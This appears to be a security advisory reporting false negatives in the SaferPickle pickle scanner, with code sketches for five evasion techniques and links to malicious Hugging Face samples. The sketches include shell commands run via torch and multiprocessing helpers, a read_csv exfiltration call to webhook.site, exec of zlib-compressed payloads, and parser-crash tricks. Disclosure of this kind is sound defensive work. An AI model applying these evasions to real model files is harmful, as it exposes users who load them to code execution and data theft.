SaferPickle: Multiple False Negative Issues
Tested version: commit 5de2ca4c74c3ebd6a3291a40ff56249b7495a3d6
Summary
During a systematic evaluation of malicious model files on Hugging Face, I identified several categories of pickle-based evasion techniques that SaferPickle fails to detect. Each section below includes a description of the technique and a reference to an actual malicious model file on Hugging Face.
1. Alternative Execution Primitives
Malicious pickle files can invoke command execution or exfiltration through functions not present in SaferPickle's denylist. Since the set of exploitable callables in the Python ecosystem is large, denylist coverage is inherently incomplete.
Command execution via torch.utils.collect_env.run:
```python
from torch.utils.collect_env import run
_var0 = run('rm pwnd.txt')
```
Command execution via multiprocessing.util.spawnv_passfds:
```python
from multiprocessing.util import spawnv_passfds
_var0 = spawnv_passfds(b'/bin/sh', ('/bin/sh', '-c', 'echo bypass'), ())
```
Command execution via mlflow.projects.backend.local._run_entry_point:
```python
from mlflow.projects.backend.local import _run_entry_point
_var0 = _run_entry_point('echo "You\'ve been pwned."', '.', '', '')
```
Data exfiltration via pandas.io.parsers.readers.read_csv:
```python
from pandas.io.parsers.readers import read_csv
_var0 = read_csv('https://webhook.site/...?pwned=pandas_bypass')
```
| Sample | HF Model ID | Filename |
| --- | --- | --- |
| `torch.utils.collect_env.run` | ias-d-kt/ias-1 | indirect_import.pkl |
| `spawnv_passfds` | aakashjapi/tmp | poc_spawnv_passfds.pkl |
| `_run_entry_point` | agentops/text-generation | pytorch_model.bin |
| `read_csv` | Tanaka53814545/pickle-model-test | pytorch_model.bin |
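The underlying mechanism is straightforward to reproduce with the standard `__reduce__` hook. The sketch below uses `print` as a benign stand-in for the primitives listed above; any importable module-level callable works, which is exactly why a denylist cannot be complete:

```python
import pickle

class Payload:
    # __reduce__ makes the pickler emit a GLOBAL + REDUCE opcode pair
    # that calls an arbitrary importable function at load time.
    def __reduce__(self):
        # Benign stand-in for run / spawnv_passfds / read_csv / etc.
        return (print, ("side effect at unpickle time",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # the call happens inside loads()
```

Any scanner that only matches known-bad GLOBAL targets will pass this file as long as the target callable is not on its list.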
2. zipfile Exception
PyTorch's custom Zip extractor differs from the standard Python zipfile module used by SaferPickle. A crafted model can exploit this gap to crash SaferPickle via a BadZipFile exception while PyTorch loads it normally. Prior research by Liu et al. (arXiv:2508.19774) describes this technique.
SaferPickle crashes with:
```
zipfile.BadZipFile: File name in directory '…/data.pkl' and header b'…/data.pal' differ.
```
| Sample | HF Model ID | Filename |
| --- | --- | --- |
| zipfile crash | HFscanner1231/malware_opcode_frequencies | does_not_scan_but_opens_in_torch.pth |
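The mismatch itself can be reproduced with a few lines of stdlib code. The sketch below assumes a single-entry archive whose 30-byte local file header sits at offset 0, and corrupts only the filename stored in that local header, leaving the central directory intact:

```python
import io
import zipfile

# Build a normal one-entry archive.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("data.pkl", b"payload")

# Overwrite the local header's filename so it no longer matches the
# central directory entry (the fixed-size local header is 30 bytes).
raw = bytearray(buf.getvalue())
raw[30:30 + len("data.pkl")] = b"data.pal"

# A scanner that relies on the stdlib zipfile module crashes on read;
# torch's own extractor (not exercised here) tolerates the mismatch.
try:
    zipfile.ZipFile(io.BytesIO(raw)).read("data.pkl")
    crashed = False
except zipfile.BadZipFile:
    crashed = True
```

The stdlib raises `BadZipFile` because `ZipFile.open` cross-checks the local header name against the central directory entry before handing out member data.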
3. pickletools Exception
Appending a truncated opcode (e.g., BINUNICODE without its required length prefix) after the malicious payload causes a ValueError in pickletools.genops. The pickle module executes opcodes sequentially, so the payload runs at REDUCE before the corrupted tail is reached.
```
 0: 80 PROTO      2
 2: 63 GLOBAL     'builtins exec'
17: 28 MARK
18: 58 BINUNICODE "\nf = open('my_file.txt', 'a'); f.write('Malicious'); f.close()"
85: 74 TUPLE
86: 52 REDUCE
87: 58 ???        ← truncated opcode crashes pickletools
```
This technique was first reported by ReversingLabs as an evasion against PickleScan, which has since patched it.
| Sample | HF Model ID | Filename |
| --- | --- | --- |
| pickletools crash | kemalik/42-eicar | model_broken_X.pkl |
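A minimal reproduction, using `builtins.print` as a benign stand-in for `builtins.exec`: the handcrafted stream below ends in a lone `X` (BINUNICODE) with its required 4-byte length prefix missing and no STOP opcode:

```python
import pickle
import pickletools

blob = (
    b"\x80\x02"                 # PROTO 2
    b"cbuiltins\nprint\n"       # GLOBAL 'builtins print'
    b"(X\x05\x00\x00\x00pwned"  # MARK, BINUNICODE 'pwned'
    b"t"                        # TUPLE -> ('pwned',)
    b"R"                        # REDUCE -> print('pwned') runs here
    b"X"                        # truncated opcode, no STOP
)

# Static analysis aborts with ValueError partway through the stream...
try:
    list(pickletools.genops(blob))
    scanner_crashed = False
except ValueError:
    scanner_crashed = True

# ...but loading still executes the REDUCE call before failing on the
# truncated tail (loads() raises only after the side effect happened).
try:
    pickle.loads(blob)
except Exception:
    pass
```

A scanner therefore has to treat a `pickletools` exception as suspicious in itself, not as an unscannable-and-therefore-clean file.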
4. Obfuscation
Malicious pickle files that compress the payload with zlib are not detected. The zlib.decompress call itself is not on the denylist, and the compressed blob hides the actual malicious code (e.g., os.system, subprocess) from pattern matching.
```python
from zlib import decompress
_var0 = decompress(b'x\xda\xbdWmk\xe3F\x10\xfe...(truncated)')
_var1 = exec(_var0)
```
| Sample | HF Model ID | Filename |
| --- | --- | --- |
| zlib obfuscation | coldwaterq/sectest | coldwaterq_inject_calc.pt |
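A small sketch of why byte-pattern matching fails here. The payload string is an inert stand-in and is never executed; the point is only that its suspicious identifiers do not appear verbatim in the compressed blob a scanner would inspect:

```python
import zlib

# Inert stand-in payload (never executed in this sketch).
payload_source = b"import os\nos.system('id')\n" * 20
compressed = zlib.compress(payload_source)

assert b"os.system" not in compressed                 # invisible to byte matching
assert zlib.decompress(compressed) == payload_source  # recovered intact at load time
```

Since `zlib.decompress` is a legitimate, widely used callable, denylisting it would produce heavy false positives, which is what makes this obfuscation attractive.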
5. Indirect Model Loading
A pickle file loads a second malicious model from the Hugging Face Hub during deserialization. Because `from_pretrained` is ubiquitous in legitimate inference code, the call looks benign to a scanner, even though a Hub download triggered from inside deserialization is itself anomalous and hands control to a second, unscanned payload.
```python
from transformers.models.auto.auto_factory import getattribute_from_module
from transformers.models.auto.tokenization_auto import AutoTokenizer
_var0 = getattribute_from_module(AutoTokenizer, 'from_pretrained')
_var1 = _var0('zpbrent/reuse')
```
This technique was originally introduced by JFrog.
| Sample | HF Model ID | Filename |
| --- | --- | --- |
| Indirect model loading | protectai-bot/transfo-xl | vocab.pkl |
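The indirection pattern can be illustrated with only the standard library. In the sketch below, `str.upper` is a benign stand-in for the `from_pretrained` lookup: the pickle's GLOBAL opcodes name only `getattr` and the object it is applied to, so the eventually-called attribute never appears as an importable name a denylist could match:

```python
import pickle

class IndirectLookup:
    # GLOBAL opcodes in the resulting pickle name only builtins.getattr
    # and builtins.str; the real target is resolved at load time.
    def __reduce__(self):
        return (getattr, (str, "upper"))

method = pickle.loads(pickle.dumps(IndirectLookup()))
assert method("pwned") == "PWNED"  # resolved and callable after loading
```

Detecting this requires reasoning about what the resolved attribute can do, not just matching the names present in the opcode stream.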